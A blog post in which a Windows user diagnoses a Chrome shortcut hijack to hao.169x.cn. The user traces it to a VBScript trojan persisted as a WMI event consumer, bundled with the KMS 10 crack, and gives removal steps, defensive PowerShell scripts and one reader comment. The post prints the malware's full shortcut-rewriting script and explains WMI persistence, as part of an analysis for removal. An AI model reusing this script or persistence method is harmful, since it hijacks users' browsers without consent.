hao.169x.cn hacked my chrome shortcut

I am running Windows 10 and am bothered by this problem. I usually have a Chrome shortcut in my Quick Launch, but sometimes it turns into a shortcut that launches “hao.169x.cn”.

I mean that when I create the shortcut, its target is:

C:\Users\ManojBhakarPCM\AppData\Local\Google\Chrome\Application\chrome.exe

but after some minutes or hours its target changes, and it now points to:

C:\Users\ManojBhakarPCM\AppData\Local\Google\Chrome\Application\chrome.exe http://hao.169x.cn/?v=108 

Some Experiments to Find the Changer Process

  1. First I searched the C:\ drive for files containing “v=108” with UltraFindFiles Lite, but it revealed nothing: nothing was found in any file except some AdwCleaner log files.

So this method failed.

  2. Second, I tried to monitor changes to the shortcut file. With Sysinternals’ ProcMon I captured events for 2 hours. To find the relevant events among the 27,745,606 captured,

I looked at the shortcut’s “Date Modified” property: it showed “4/1/2017 6:13 PM”.

So first I filtered file events by path as follows:

if path is C:\Users\ManojBhakarPCM\Desktop\chrome.lnk then include

Then I checked Tools -> File Summary and saw only two file write events there in total.

But I did not know how to filter for write events, so I added one more (highlighting) filter as follows:

if Details contains Write then include

This did reduce the number of events to look through, though there were still many: those with QueryBasicInformationFile details, whose details contain a LastWrite string.

But I looked at the specific time, 6:13 PM, and soon found it.

Two processes had opened the shortcut file for writing.

[Screenshot: ScreenShot_20170104211425.png]

As far as I understood, scrcons.exe rewrote my chrome.lnk shortcut file.

But I checked with sfc, and none of the Windows system files had been tampered with. I scanned my whole computer with Zemana Antivirus and AdwCleaner; they only remove the shortcuts and some registry entries, not the creator. I am still infected.

Oh yes, with Zemana Antivirus I always detect four instances of hao.169x.cn: 2 are shortcuts and the other 2 are registry entries, which are under

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\UFH\SHC

Subkeys 108 and 118 hold the entries:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
http://hao.169x.cn/?v=108


New Tests –

Sending scrcons.exe to VirusTotal via the VirusTotal uploader:

It’s safe. Nothing found. 😦

This scrcons.exe is in the wbem folder, and I noticed suspicious activity from WmiPrvSE.exe, which is located in the same folder.

Help if anybody knows about it. I am still infected.

UPDATE: FOUND the Cause And Solution.

Yes, it’s a trojan. It comes with KMS 10 (KMS is a cracker for all Microsoft software).

This trojan is a VBScript that resides in WMI as an event consumer. It runs either after a fixed time interval or at Windows logon (restarting or waking from sleep). The script is executed by scrcons.exe, the WMI Standard Event Consumer host, which is why that binary itself is clean on VirusTotal: the malicious content is the script text stored in WMI, not the executable that runs it.

In WMI the event name is VBScriptKids_consumer; you can search for this word on the net to find other blogs about it.

To remove:

  1. Install WMI Event Viewer.
  2. Connect to the namespace root\CIMv2.
  3. Within this namespace, delete every entry named vbscriptkids from all of the Timers, Consumers and Filters (including the binding that links the filter to the consumer, if the viewer shows one), and you are done.
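The same clean-up from Windows PowerShell, as an added example that is not part of the original post. It lists every filter, consumer, binding and timer whose name matches a pattern, saves each consumer’s script text to a file for inspection, and deletes them only when -Remove is given. It assumes Windows PowerShell 5.1 (Get-WmiObject and Remove-WmiObject are not in PowerShell 7) run from an elevated prompt, because deleting these instances as a normal user fails with an access-denied error. The namespace list and the *vbscriptkids* pattern are assumptions drawn from this post; root\subscription is checked as well as root\CIMv2 because that is where WMI permanent event subscriptions normally live.

```powershell
<#
  Added example, not code from the original post.
  Enumerates (and with -Remove deletes) WMI permanent event subscriptions whose
  name matches $Pattern. Assumes Windows PowerShell 5.1 and an elevated prompt.
  Namespace list and default pattern are assumptions taken from the post.
#>
param(
    [string]$Pattern = '*vbscriptkids*',
    [switch]$Remove
)

# root\subscription is the usual home of permanent subscriptions;
# the post found the entries under root\CIMv2, so both are checked.
$namespaces = 'root\subscription', 'root\cimv2'

function Get-WmiClassInstances([string]$Namespace, [string]$Class) {
    # Some classes (e.g. ActiveScriptEventConsumer) do not exist in every namespace
    Get-WmiObject -Namespace $Namespace -Class $Class -ErrorAction SilentlyContinue
}

foreach ($ns in $namespaces) {
    Write-Host "== $ns =="

    # Filter: the WQL query that fires the consumer (a timer or a logon event)
    $filters   = Get-WmiClassInstances $ns __EventFilter |
                 Where-Object { $_.Name -like $Pattern }
    # Consumer: holds the script text; scrcons.exe executes it when the filter fires
    $consumers = Get-WmiClassInstances $ns ActiveScriptEventConsumer |
                 Where-Object { $_.Name -like $Pattern }
    # Binding: ties a filter to a consumer (Filter/Consumer are object-path strings)
    $bindings  = Get-WmiClassInstances $ns __FilterToConsumerBinding |
                 Where-Object { $_.Filter -like $Pattern -or $_.Consumer -like $Pattern }
    # Timer: raises a __TimerEvent every IntervalBetweenEvents milliseconds
    $timers    = Get-WmiClassInstances $ns __IntervalTimerInstruction |
                 Where-Object { $_.TimerId -like $Pattern }

    foreach ($f in $filters)  { "FILTER   $($f.Name)`n         $($f.Query)" }
    foreach ($t in $timers)   { "TIMER    $($t.TimerId) every $($t.IntervalBetweenEvents) ms" }
    foreach ($b in $bindings) { "BINDING  $($b.Filter) -> $($b.Consumer)" }
    foreach ($c in $consumers) {
        "CONSUMER $($c.Name) engine=$($c.ScriptingEngine)"
        # Keep a copy of the embedded script for analysis before anything is deleted
        $out = Join-Path $env:TEMP ("wmi_" + $c.Name + ".txt")
        $c.ScriptText | Set-Content -LiteralPath $out
        "         script saved to $out"
    }

    if ($Remove) {
        # Bindings first, so nothing can fire while the remaining pieces are removed
        @($bindings) + @($filters) + @($consumers) + @($timers) |
            Where-Object { $_ } |
            ForEach-Object {
                Write-Host "removing $($_.__PATH)"
                Remove-WmiObject -InputObject $_
            }
    }
}
```

Run it once without -Remove and compare the saved script text with the VBScript further down; if the listing is empty in both namespaces, widen the pattern (for example '*') and read the names, since a later variant may not use the vbscriptkids name. If removal still reports access denied from an elevated prompt, check that the shell is really running as Administrator rather than as a member of the Administrators group with a non-elevated token.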

The script is VBScript stored inside WMI; I reformatted it to copy-paste it here.

' Swallow every runtime error so the script never stops half way
On Error Resume Next
' URL appended as the argument of every browser shortcut (a separate variant for 360se)
Const link = "http://hao.169x.cn/?v=108"
Const link360 = "http://hao.169x.cn/?v=108&s=3"
' Executable names of the browsers whose shortcuts get hijacked (mostly Chinese browsers)
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
' Folders searched for .lnk files: public and user desktop, Start Menu, Quick Launch and pinned items
lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\ManojBhakarPCM\Desktop,C:\Users\ManojBhakarPCM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\ManojBhakarPCM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\ManojBhakarPCM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\ManojBhakarPCM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
' Build a lower-cased lookup of the browser executable names
browsersArr = split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")
For Each browser In browsersArr
    oDic.Add LCase(browser), browser
Next
' Build the set of folders to scan
lnkpathsArr = split(lnkpaths,",")
Set oFolders = CreateObject("scripting.dictionary")
For Each lnkpath In lnkpathsArr
    oFolders.Add lnkpath, lnkpath
Next
Set fso = CreateObject("Scripting.Filesystemobject")
Set WshShell = CreateObject("Wscript.Shell")
For Each oFolder In oFolders
    If fso.FolderExists(oFolder) Then
        ' Only the files directly in the folder; subfolders are not visited
        For Each file In fso.GetFolder(oFolder).Files
            If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
                ' CreateShortcut on an existing .lnk loads it for editing
                Set oShellLink = WshShell.CreateShortcut(file.Path)
                path = oShellLink.TargetPath
                name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
                ' Only shortcuts whose target is one of the listed browsers are touched
                If oDic.Exists(LCase(name)) Then
                    If LCase(name) = LCase("360se.exe") Then
                        oShellLink.Arguments = link360
                    Else
                        oShellLink.Arguments = link
                    End If
                    ' Bit 1 is the ReadOnly attribute; clear it so Save succeeds
                    If file.Attributes And 1 Then
                        file.Attributes = file.Attributes - 1
                    End If
                    oShellLink.Save
                End If
            End If
        Next
    End If
Next

which simply means: modify the shortcuts of every kind of browser that may reside in Quick Launch, on the Desktop or in the Start Menu, so that the browser opens hao.169x.cn whenever it is launched from one of them.
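A check for what that script leaves behind, added here as an example and not part of the original post. It walks the same shortcut folders the VBScript targets, with the hard-coded user paths replaced by environment variables and subfolders included (the original script does not recurse, so this is deliberately broader), reads each .lnk through the same WScript.Shell COM object, and reports every shortcut whose Arguments contain a URL. With -Fix it clears the arguments and saves the shortcut. The URL pattern is an assumption: review the report before using -Fix, because shortcuts that Chrome creates for web apps can legitimately carry a URL in their arguments.

```powershell
<#
  Added example, not code from the original post.
  Reports (and with -Fix repairs) .lnk files whose Arguments contain a URL in
  the folders the hao.169x.cn script targets. Folder list mirrors the script
  with environment variables; the URL regex is an assumption.
#>
param([switch]$Fix)

$folders = @(
    "$env:PUBLIC\Desktop",
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs",
    "$env:USERPROFILE\Desktop",
    "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch",
    "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu",
    "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar",
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs"
)

# Same COM object the malware uses; CreateShortcut on an existing file loads it
$shell = New-Object -ComObject WScript.Shell

foreach ($dir in $folders) {
    if (-not (Test-Path -LiteralPath $dir)) { continue }
    # -Recurse is broader than the script, which only looks at the folder itself
    Get-ChildItem -LiteralPath $dir -Filter *.lnk -Recurse -File | ForEach-Object {
        $lnk = $shell.CreateShortcut($_.FullName)
        if ($lnk.Arguments -match 'https?://') {
            [pscustomobject]@{
                Shortcut  = $_.FullName
                Target    = $lnk.TargetPath
                Arguments = $lnk.Arguments
            }
            if ($Fix) {
                # The script clears ReadOnly before saving; do the same so Save() succeeds
                $_.IsReadOnly = $false
                $lnk.Arguments = ''
                $lnk.Save()
            }
        }
    }
}
```

Repairing the shortcuts only helps once the WMI subscription is gone; while the consumer is still registered, the next timer or logon event rewrites them again, which is exactly the “after some minutes/hours” behaviour described at the top of the post. Run the report first, remove the WMI entries, then run it with -Fix, and run it once more later to confirm nothing came back.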

Now I have deleted everything related to this in WMI and recreated all the shortcuts, and I am waiting to see whether the problem comes back.


2 thoughts on “hao.169x.cn hacked my chrome shortcut”

  1. Hi Manoj.
    I finally found on the Internet a sensible reply concerning my problem (in a language understandable to me). I caught exactly the same ailment as you (hao.169x.cn) and in exactly the same way (KMS10). Thanks to your post I located where the trash hides, but unfortunately I cannot get rid of it.
    Of course first I removed KMS. Then, following your instructions:
    – I installed WMI Event Viewer,
    – I located all the VBScriptKids entries (in all of Consumers, Filters, Timers) and got to the poisoned script
    – And… I cannot remove it 😦
    Unfortunately the command “Delete instance” (in the WMI Event Registration Editor’s pop-up menu) does not work. In response I get the message “WMI Access denied. Can not delete instance \\ …”.
    I would be very grateful if you could explain to me more precisely how I can remove this stuff from the system. I am a rather ordinary Windows user, but I think I’m still not a dilettante ;). Please, your help.
    I use Win7/64 and w.b. FF.
    Regards
    yanoo
